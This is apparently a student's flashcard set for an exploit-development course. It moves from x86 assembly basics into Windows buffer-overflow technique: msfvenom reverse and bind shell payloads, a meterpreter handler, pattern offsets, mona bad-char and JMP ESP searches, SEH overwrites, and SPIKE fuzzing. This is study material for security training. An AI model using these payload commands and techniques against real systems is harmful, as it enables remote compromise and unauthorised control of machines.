SLAE - Extras Flashcards
Opcodes and ASM commands
Accessing memory reference with []
- message db 0xAA, 0xBB, 0xCC, 0xDD <== makes variable message
- mov eax, message <== moves address of message into eax
- mov eax, [message] <== moves value of message into eax
declaring uninitialized data -
What is resb
What is resw
buffer: resb 64 ; reserve 64 bytes
wordvar: resw 1 ; reserve a word
Uninitialized data is placed in the bss segment
Check NASM manual pg. 30
Special tokens -
- What is $
- What is $$
$ - evaluates to the current line
$$ - evaluates to the beginning of the current section
These are used at times to figure out the offset of the current instruction from something else (often)
for example
message: db ‘hello world!’
msglen: equ $-message
So how this works is $ signifies a reference to the beginning of the second line before msglen while message signifies the beginning of the ‘hello world!’ string, so $ - message = ‘len of ‘h-!’
Or jmp $ would create an infinite loop that keep jumping back to the beginning of the section
This is a bit confusing check SLAE module 10 5:57
Check NASM manual pg. 37
what does the following lines of code do
zerobuf: times 64 db 0
times 100 movsb
zerobuf: times 64 db 0
repeats ‘declare byte 0’ 64 times
times 100 movsb
instruction where movsb is to be repeated 100 times
What is Little Endian
The lower byte gets stored in lower memory and the higher byte gets stored in higher memory
https: //
https: //
1) What does it stand for
2) What does it do
3) Syntax of LEA
4) What is its opcode
1) LEA stands for 'Load Effective Address' 2) It loads a pointer values for example into a register 3) if the variable 'label' is at 0x8049254
LEA EAX, [label]
will make the value of EAX 0x8049254
1) What does it stand for
2) What does it do
3) Syntax of XCHG
4) What is its opcode
It swaps values for example in registers
XCHG Register, Register
(swaps values of two registers)
XCHG Register, Memory
(Swaps values of register and memory address)
4) Going to skip for minute due to different registers but makes to come back to
What is MOV
What are its allowed directions
MOV - Responsible for moving register memory and data in the following ways
- Allowed directions
- Between registers
- Memory to register and register to memory
- Immediate data to register
- Immediate data to memory
r/m16 and r/m32 means…
it means it could be taking a value either from a register, or a memory
For example in x86 you can only push and pop r/m16 and r/m32 values on the stack
ie 16 bit and 32 bit
push ax
pop bx
push eax
pop ecx
What instructions does LEAVE do
LEAVE is equivalent to :
Functions will often start with
So LEAVE returns things to the state they were in when we initiated the function
When using EBP as a base pointer for a function, what will the offsets from EBP be for
- the return address
- the first parameter
- the first local variable
Represent it as EBP+(number)
* the return address: EBP+4 * the first parameter: EBP+8 * the first local variable: EBP-4
By using a base pointer the return address will always be at ebp+4, the first parameter will always be at ebp+8, and the first local variable will always be at ebp-4. Even as the stack size grows and shrinks those offsets do not change. This also makes it easier for disassemblers because it’s easy to track the parameters and local variables being access throughout the function because their addresses never change.
For example:
0022FEC4 00404016 ASCII “Function 1”
0022FEC8 /0022FEF8 Frame Pointer EBP
0022FECC |00401596 Return Address in main()
0022FED0 |11111111 Argument to function 1
What does RETN do
The stack will onwound by the functions conclusion
LEAVE is equivalent to :
That means the stack should now point to the address just after it was called.
so the
will bring us to the place in program after the function was called and flow will continue
RET pops top of stack into EIP
JE [Jump if Equals]
CMP subtracts the operands and sets the flags. Namely, it sets the zero flag if the difference is zero (operands are equal).
TEST sets the zero flag, ZF, when the result of the AND operation is zero. If two operands are equal, their bitwise AND is zero when both are zero. TEST also sets the sign flag, SF, when the most significant bit is set in the result, and the parity flag, PF, when the number of set bits is even.
See here for excellent explanation:
JE [Jump if Equals] tests the zero flag and jumps if the flag is set. JE is an alias of JZ [Jump if Zero] so the disassembler cannot select one based on the opcode. JE is named such because the zero flag is set if the arguments to CMP are equal.
TEST %eax, %eax
JE 400e77
jumps if the %eax is zero.
How do you easily get the shellcode into assembly instructions. What command on Kali
pipe it into:
| ndisam -u -
For example:
$msfvenom windows -p windows/shell_bind_tcp -f c | ndisasm -u - -p intel
A way to find your shellcode using the hex dump in Immunity
- Copy a part of it into clipboard, lets say:
\xfc\xe8\x82\x00 - Right click on the Hex Dump window and select:
Search for > Binary string
(or ctrl + b) - This will get you the address
Metasploit pattern create usage
cd /usr/share/metasploit-framework/tools/exploit/
/pattern_create.rb -l 2000
Then find pattern offset
Say EIP is 69423569
/pattern_offset.rb -q 69423569
msf venom usage basic
msfvenom -p windows/shell_bind_tcp -f c -a x86
- f c = language c (try python)
- a = architecture x86
a good alphanu,meric reverse shell though watch out for first chars
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -a x86 -e x86/alpha_mixed -b “\x00\x09\x0a\x0d\x2e\xff” -f python
msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f python -a x86
use exploit/multi/handler # msf meterpreter handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [your ip address] exploit
stable raw reverse shell
msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp lhost= lport=443 EXITFUNC=thread -f python
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of python file: 1556 bytes
#### Calc for prototyping
msfvenom -a x86 —platform windows -p windows/exec cmd=calc.exe -b ”\x00\x0a\x0d” -f python
#### Really small (107 bytes) add admin shellcode - Needs to be compiled
MSG code 113 bytes
post exploit cmd prompt fun
Remember these one liners
pop calc - the classic
#################### open webbrowser
start iexplore
start firefox
[note sites above very NSFW]
One liner to launch a command prompt message box
mshta “javascript:var sh=new ActiveXObject( ‘WScript.Shell’ ); sh.Popup( ‘Message!’, 0, ‘Title!’, 64 );close()”
or simple but not as good
mshta “javascript:alert(‘Message!’);”
See proper docs here
############## speech mshta vbscript:Execute("CreateObject(""SAPI.SpVoice"").Speak(""Hello"")(window.close)")
map files
dir /s /b>filelist.txt
tree /f
an interrupt in hex and what it is for
or INT3
It will create a breakpoint.
Sometimes good for observing shellcode in debugger but be careful it can break things
Mona and bad chars
!mona bytearray
- Produces bytearray
Example code-stub to read byte array from python:
buffer += open(“/root/Desktop/Exploit Dev Shared/MonaIO/mona_patternminishare/bytearray.bin”, “rb”).read()
Compares byte array with memory address -
First param is address of byte array, 2nd is memory address where byte array should start
!mona compare -f F:\mona_patternminishare/bytearray.bin -a 013b3908
So then say we see \x00 is a bad char we then generate another byte array and exclude it
!mona bytearray -cpb ‘\x00’
Mona find jmps
!mona jmp -r esp -n
jmp = look for jmps
-r esp = register esp
-n = don’t show pointers that have null bytes
( = cpb ‘\x00’)
-m kernel32.dll
only search in this module
precise instruction
!mona find -type instr -s “call ebx”
Methods of JMP’ing 1
- jump (or call)
- pop return
- push return
jump (or call)
a register that points to the shellcode. With this technique, you basically use a register that contains the address where the shellcode resides and put that address in EIP. You try to find the opcode of a “jump” or “call” to that register in one of the dll’s that is loaded when the application runs. When crafting your payload, instead of overwriting EIP with an address in memory, you need to overwrite EIP with the address of the “jump to the register”.� Of course, this only works if one of the available registers contains an address that points to the shellcode. This is how we managed to get our exploit to work in part 1, so I’m not going to discuss this technique in this post anymore.
pop return :
If none of the registers point directly to the shellcode, but you can see an address on the stack (first, second, … address on the stack) that points to the shellcode, then you can load that value into EIP by first putting a pointer to pop ret, or pop pop ret, or pop pop pop ret (all depending on the location of where the address is found on the stack) into EIP.
push return :
this method is only slightly different than the “call register” technique.� If you cannot find a or opcode anywhere, you could simply put the address on the stack and then do a ret.� So you basically try to find a push , followed by a ret.� Find the opcode for this sequence, find an address that performs this sequence, and overwrite EIP with this address.
Methods of JMP’ing 2
- jmp [reg + offset]
- blind return
- JMP code
jmp [reg + offset] :
If there is a� register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or application dll’s, which will add the required bytes to the register and then jumps to the register. I’ll refer to this method as jmp [reg]+[offset]
blind return :
in my previous post I have explained that ESP points to the current stack position (by definition).� A RET instruction will ‘pop’ the last value (4bytes) from the stack and will put that address in ESP. So if you overwrite EIP with the address that will perform a RET instruction, you will load the value stored at ESP into EIP.
JMP code
If you are faced with the fact that the available space in the buffer (after the EIP overwrite) is limited, but you have plenty of space before overwriting EIP, then you could use jump code in the smaller buffer to jump to the main shellcode in the first part of the buffer.
Every application has a default exception handler which is provided for by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanation before you can start abusing the SEH to write exploits.� The idea behind this is that if you build an exploit that does not work on a given OS, then the payload might just crash the application (and trigger an exception). So if you can combine a “regular” exploit with a seh based exploit, then you have build a more reliable exploit. Anyways, the next part of the exploit writing tutorial series (part 3) will deal with SEH.�� Just remember that a typical stack based overflow, where you overwrite EIP, could potentionally be subject to a SEH based exploit technique as well, giving you more stability, a larger buffer size (and overwriting EIP would trigger SEH… so it’s a win win)
POP opcodes
pop eax 58 pop ebx 5b pop ecx 59 pop edx 5a pop esi 5e pop ebp 5d
More Jmps - JMPS 3
Custom Jumpcode:
Short jumps and conditional jumps:
(Short JMPs are 127 bytes [7Fh] forwards or back)
(really good chart in Corelan tutorial below)
See also:
Short JMPs are 127 bytes [7Fh] forwards or back
. The first byte of a SHORT Jump is always EB
and the second is a relative offset from 00h to 7Fh for Forward jumps,
and from 80h to FFh for Reverse (or Backward) j
[Note: The offset count always begins at the byte immediately after the JMP instruction for any type of Relative Jump!]
So if we are at address 100h
- an instruction of EB 00 will get us to 102h
- an instruction of EB 01 will get us to 103h
Negative jumps:
These descend. So the highest hex value FFh is the shortest JMP (-1) and 80h is the longest -128.
In reality since it needs to count down through itself the first 3 jmps don’t act as you would expect.
if we start at 200h EB FF - 201 (ascends!) EB FE - 200 (endless loop!) EB FD - 1FF ( - 1) EB FC - 1FE (-2)
EB 83 ( -122)
Simple rules is take away 3 from value for bytes you will move
EB 7D will be negative 123 bytes
EB 7F will be negative 125 bytes
Many conditional short jumps as well in Corelan
(really good chart in Corelan tutorial below)
Common Bad Chars.
If the buffer is getting mysteriously warped start with these
00 for NULL 09 0A for Line Feed \n 0D for Carriage Return \r FF for Form Feed \f
More common pop pop rets
pop edi, pop esi, pop ebx, ret
popad, ret (equivalent to x 8 pops dwords or 32 bytes)
does in this order:
POP EDI, POP ESI, POP EBP, POP ESP, POP EDX, POP ECX, POP EAX (with ESP being discarded??? don’t get that)
can also be put in shell as jumpcode. See:
\x61 # popad
\xff\xe4 # JMP esp
excellent resource on jumps
Spike Usage
Generic usage:
generic_send_tcp - works from terminal in Kali
generic_send_tcp host port spike_script SKIPVAR SKIPSTR
arg 1, 2 and 3 = host, port, scripts
SKIPVAR and SKIPSTR, essentially allow you to jump into the middle of the fuzzing session defined by a SPIKE script.
For example, if you include three “s_string_variables” in your SPIKE script, and you want to ignore the first two variables and only fuzz the third, you would set SKIPVAR to 2 (the numbering of the variables starts counting upwards from 0, so the third variable is referred to by the number 2).
Each of the “s_string_variables” also has an array of different fuzz string values inbuilt into SPIKE that it will iterate through within a SPIKE fuzzing session. If you want to skip the first 10 of these strings, and start fuzzing at string 11, you can set SKIPSTR to 10 (again, counting starts from 0).
Installation instructions for adapted spike -
One that quits after bad requests on network
sudo apt-get install build-essential
cd ~ mkdir arsenal cd arsenal wget tar -xzvf SPIKE2.9.tgz cd SPIKE/src ./configure make
Before you actually compile SPIKE, I recommend making a small change to the source first. Edit the file spike.c in SPIKE/SPIKE/src from the source tarball, and find the two “return 0;” strings that immediately follow the lines “printf(“tried to send to a closed socket!\n”);”. Replace these two “return 0;” lines with “exit(1);”. This change will essentially cause SPIKE to exit with a non zero return code when it tries to send data to a closed socket – this becomes useful when we run SPIKE from a wrapper script later on in this article. Once this change is made you can compile SPIKE using the normal “./configure; make” commands run from the src directory.
Wireshark and spike
Set up wireshark to be capturing packets
- Use this
host and tcp port 9999
Once it crashes
Track down the variable that caused the crash as mentioned in this article. You are looking for the last ‘Welcome’ without a response
Peach 3 tutorials
https: //
https: //
that ^^^ for peach 2 so consult these
http: //
http: //
https: //
SEH based exploits errata
When exception is triggered the address of Next SEH is loaded into ESP + 8
Hence why we want the pop pop ret.
A bit of a refresher on how ret works here:
RETN = Pop the address on the top of the stack, then return to that address. ie. EIP is top of the stack
- SEH overwritten to an address that is a pop pop ret
- This makes EIP Next SEH
- Next SEH will have to contain some sort of jump to our shellcode
More mona
Finding JMP ESP in module with MONA In Immunity, at the bottom, execute this command in the white bar.
!mona find -s "\xff\xe4" -m essfunc.dll
This searches the essfunc.dll module for the bytes FFE4.
The hexadecimal code for a “JMP ESP” instruction is FFE4.
The hexadecimal code for the two-instruction sequence “POP ESP; RET” is 5CC3.
can find with nasm_shell.rb